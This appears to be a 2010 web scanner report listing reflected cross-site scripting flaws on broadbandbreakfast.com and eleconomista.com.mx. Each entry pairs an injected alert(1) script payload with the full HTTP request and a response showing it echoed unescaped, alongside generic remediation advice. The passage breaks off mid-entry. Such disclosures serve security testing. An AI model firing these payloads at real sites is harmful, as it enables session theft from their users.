Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0309"><script>alert(1)</script>efbaba2da5 was submitted in the REST URL parameter 3. This input was echoed as e0309\"><script>alert(1)</script>efbaba2da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08/uae-expects-to-offer-all-fiber-network-by-2011e0309"><script>alert(1)</script>efbaba2da5/ HTTP/1.1
Host: broadbandbreakfast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 13 Dec 2010 03:16:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://broadbandbreakfast.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Mon, 13 Dec 2010 03:16:48 GMT
Content-Length: 30107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<form method="post" action="/2010/08/uae-expects-to-offer-all-fiber-network-by-2011e0309\"><script>alert(1)</script>efbaba2da5/#mc_signup_form" id="mc_signup_form">
...[SNIP]...
1.2. http://broadbandbreakfast.com/2010/08/uae-expects-to-offer-all-fiber-network-by-2011/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42487"><script>alert(1)</script>d73408bf02b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42487\"><script>alert(1)</script>d73408bf02b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08/uae-expects-to-offer-all-fiber-network-by-2011/?42487"><script>alert(1)</script>d73408bf02b=1 HTTP/1.1
Host: broadbandbreakfast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Dec 2010 03:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://broadbandbreakfast.com/xmlrpc.php
Link: <http://wp.me/pHCPu-2Nv>; rel=shortlink
Content-Length: 52313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...
<form method="post" action="/2010/08/uae-expects-to-offer-all-fiber-network-by-2011/?42487\"><script>alert(1)</script>d73408bf02b=1#mc_signup_form" id="mc_signup_form">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 773a9"-alert(1)-"c5f3579f949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010773a9"-alert(1)-"c5f3579f949/10/05/televisa-condiciona-acuerdo-univision HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:16:52 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=88ha7h361bhjdt73i07pckopn6; expires=Wed, 05-Jan-2011 06:50:12 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:53 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:16:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/corporativos/2010773a9"-alert(1)-"c5f3579f949/10/05/televisa-condiciona-acuerdo-univision"); //-->
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb5e7"-alert(1)-"82eee3acf9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10fb5e7"-alert(1)-"82eee3acf9f/05/televisa-condiciona-acuerdo-univision HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:01 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=6vrn5k0g3iies5ubtf0eingg85; expires=Wed, 05-Jan-2011 06:50:21 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:02 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10fb5e7"-alert(1)-"82eee3acf9f/05/televisa-condiciona-acuerdo-univision"); //-->
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ec20"-alert(1)-"5fef75ce9c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10/055ec20"-alert(1)-"5fef75ce9c6/televisa-condiciona-acuerdo-univision HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:11 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=ftm0s5mcqupgjfn3iujj36rp15; expires=Wed, 05-Jan-2011 06:50:31 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:12 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10/055ec20"-alert(1)-"5fef75ce9c6/televisa-condiciona-acuerdo-univision"); //-->
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b741"-alert(1)-"9bdae50ed81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10/05/televisa-condiciona-acuerdo-univision6b741"-alert(1)-"9bdae50ed81 HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:19 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=d3c7p5qll2v3gk92lq1m0ujdq2; expires=Wed, 05-Jan-2011 06:50:39 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:20 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 26005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10/05/televisa-condiciona-acuerdo-univision6b741"-alert(1)-"9bdae50ed81"); //-->
...[SNIP]...
1.7. http://eleconomista.com.mx/corporativos/2010/10/05/televisa-condiciona-acuerdo-univision [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a2b4"-alert(1)-"e5522e8863a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporativos/2010/10/05/televisa-condiciona-acuerdo-univision?3a2b4"-alert(1)-"e5522e8863a=1 HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:16:00 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=8re538vf9sagj99nqlta6h9cg2; expires=Wed, 05-Jan-2011 06:49:20 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:01 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:16:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 45226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/corporativos/2010/10/05/televisa-condiciona-acuerdo-univision?3a2b4"-alert(1)-"e5522e8863a=1"); //-->
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86840"-alert(1)-"c2f584476e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/201086840"-alert(1)-"c2f584476e0/02/21/mira-industria HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:11:11 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=igll2ggg61p6cob8tf77m84ea1; expires=Wed, 05-Jan-2011 06:44:31 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:11:12 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:11:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industria-global/201086840"-alert(1)-"c2f584476e0/02/21/mira-industria"); //-->
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7923"-alert(1)-"c93556a5fa1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02b7923"-alert(1)-"c93556a5fa1/21/mira-industria HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:11:30 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=5hup7host2ggl6a7vfn1el1q02; expires=Wed, 05-Jan-2011 06:44:50 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:11:31 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:11:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02b7923"-alert(1)-"c93556a5fa1/21/mira-industria"); //-->
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9784"-alert(1)-"1d6e4d1a3c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02/21d9784"-alert(1)-"1d6e4d1a3c3/mira-industria HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:40 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=hnr5atsn6cq2tqipmmfoch9eb7; expires=Wed, 05-Jan-2011 06:51:00 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:41 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02/21d9784"-alert(1)-"1d6e4d1a3c3/mira-industria"); //-->
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfc5"-alert(1)-"189308f1348 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02/21/mira-industria8cfc5"-alert(1)-"189308f1348 HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:57 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=m7t8qr8bf57oh4acjil8fp58h4; expires=Wed, 05-Jan-2011 06:51:17 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:58 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 32028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02/21/mira-industria8cfc5"-alert(1)-"189308f1348"); //-->
...[SNIP]...
1.12. http://eleconomista.com.mx/industria-global/2010/02/21/mira-industria [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://eleconomista.com.mx
Path:
/industria-global/2010/02/21/mira-industria
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9114c"-alert(1)-"af39dcc9fff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industria-global/2010/02/21/mira-industria?9114c"-alert(1)-"af39dcc9fff=1 HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:16:02 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=od2okgejadm1opeduf5vja0rr7; expires=Wed, 05-Jan-2011 06:49:22 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:03 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:16:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 43231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industria-global/2010/02/21/mira-industria?9114c"-alert(1)-"af39dcc9fff=1"); //-->
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54760"-alert(1)-"18af1847e48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/201054760"-alert(1)-"18af1847e48/06/21/sector-telecom-ganara-mayor-competencia-analistas HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:04 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=lcesionb02pesopk908apesqe7; expires=Wed, 05-Jan-2011 06:50:24 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:05 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 31967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industrias/201054760"-alert(1)-"18af1847e48/06/21/sector-telecom-ganara-mayor-competencia-analistas"); //-->
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b843c"-alert(1)-"4b514251d34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06b843c"-alert(1)-"4b514251d34/21/sector-telecom-ganara-mayor-competencia-analistas HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:23 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=stkcdo81eqap04i4h7848jpdj7; expires=Wed, 05-Jan-2011 06:50:43 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:24 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 31967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industrias/2010/06b843c"-alert(1)-"4b514251d34/21/sector-telecom-ganara-mayor-competencia-analistas"); //-->
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca073"-alert(1)-"76e72ea1883 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06/21ca073"-alert(1)-"76e72ea1883/sector-telecom-ganara-mayor-competencia-analistas HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:42 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=bhspqa4d6uev3egdd1a528dqi2; expires=Wed, 05-Jan-2011 06:51:02 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:17:43 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 31967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industrias/2010/06/21ca073"-alert(1)-"76e72ea1883/sector-telecom-ganara-mayor-competencia-analistas"); //-->
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd318"-alert(1)-"d3ee9d4d75d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistasfd318"-alert(1)-"d3ee9d4d75d HTTP/1.1
